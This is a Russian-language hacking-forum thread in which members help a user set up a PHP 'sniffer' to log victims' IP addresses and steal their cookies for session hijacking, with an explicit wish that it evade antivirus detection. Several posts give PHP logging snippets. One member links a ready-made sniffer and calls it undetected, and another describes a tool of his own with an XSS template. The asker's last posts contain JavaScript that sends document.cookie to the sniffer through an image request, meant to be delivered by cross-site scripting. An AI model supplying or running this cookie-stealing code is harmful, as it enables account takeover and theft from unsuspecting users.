подскажите php sniffer

Discussion in 'PHP' started by cleric.80, 3 Apr 2011.

  1. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    подскажите правельный php сниф,
    чтоб ip записывл и куки тянул и все остальное... ну вы поняли., что по горячим следам зайти туда откуда пришли на снифер...
    - FriLL Web Sniffer - палится каспером :mad:
    - от Каника сниф - не пробовал, тож не самый простой :mad:
    задача в том чтоб писал лог всех кто зайдет (ip),
    онлайн не вариант,есть тема.
    я ету тему перв раз курю, не судите строго
     
    #1 cleric.80, 3 Apr 2011
    Last edited: 16 Aug 2011
  2. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    cleric.80
    PHP:
    file_put_contents('ips.txt'$_SERVER['REMOTE_ADDR']."\r\n"FILE_APPEND);
     
    _________________________
    1 person likes this.
  3. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    уже пробую
     
  4. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    а куда ето вставлять ?
     
  5. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    в php файл под <?php
     
    1 person likes this.
  6. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    Code:
    2 файла на хост- 
    1)index.php 
    <?php
    file_put_contents('ips.txt', $_SERVER['REMOTE_ADDR']."\r\n", FILE_APPEND);
    2) ips.txt 
      так?
     а если уже есть index.html ?
     
  7. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    sozdai "sniff.php"
    v nego sun': <?php file_put_contents('ips.txt', $_SERVER['REMOTE_ADDR']."\r\n", FILE_APPEND); ?>
    vse
     
    1 person likes this.
  8. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    сделал, чмод 777 у обоих файлов, ips.txt - пуст (((((
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    http://www.multiupload.com/4AIUZ3NDK7
    на тебе отличный сниф
     
    1 person likes this.
  10. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    спс
    - бесплатный? законченый?
    - не палится?
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    Да, бесплатный, законченый
    и не палится
     
    1 person likes this.
  12. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    :) :) :)
     
  13. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    все заработал )) +++ ток серавно вопросов дафига
    буду курить
     
  14. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    я писал сам себе снифф отличный. ловит данные + ип + браузер + реферер + дату лога + делает яваскрипт-линк, который активачит награбленные куки + скрыт на хостинге + есть встроенный шаблон хсс файла для биндинга с сайта )
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    хм... странно, где тебе такое пишет? у меня всё нормально.

    на чисто для ip

    PHP:
    <?php
    $f
    =fopen("sn.txt","a+");
    fwrite($f,$_SERVER['QUERY_STRING']."\r\n");
    fclose($f);
    ?> 
     
  16. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
     
  18. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    ну во и поделись....
     
  19. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    из FAQa :
    Помимо вышеуказанных параметров, снифферу можно передать в запросе произвольную информацию, отделив ее знаком ?. В логе она окажется в поле QUERY. Если вам нужно перехватить cookies пользователя или иную информацию, известную только браузеру, не обойтись без использования JavaScript. Пример кода, перехватывающего cookies:

    <script>img=new Image(); img.src="[путь к s.gif]?"+document.cookie;</script> - как ето использовать можно пример ?
    как должна выглядеть ссылка на сниф ?
    если я просто указываю адрес до s.gif то сниф пишет в лог только ip,волшебной палочки что то не видать.
     
  20. cleric.80

    cleric.80 Elder - Старейшина

    Joined:
    28 Mar 2008
    Messages:
    525
    Likes Received:
    241
    Reputations:
    14
    понимаю что нужна активная XSS,
    я не ленюсь, я просто пока не знаю что с етим делать :
    <script>
    var im1 = new Image(); im1.src="http://localhost/sniffer/snif.gif"+document.cookie;
    </script>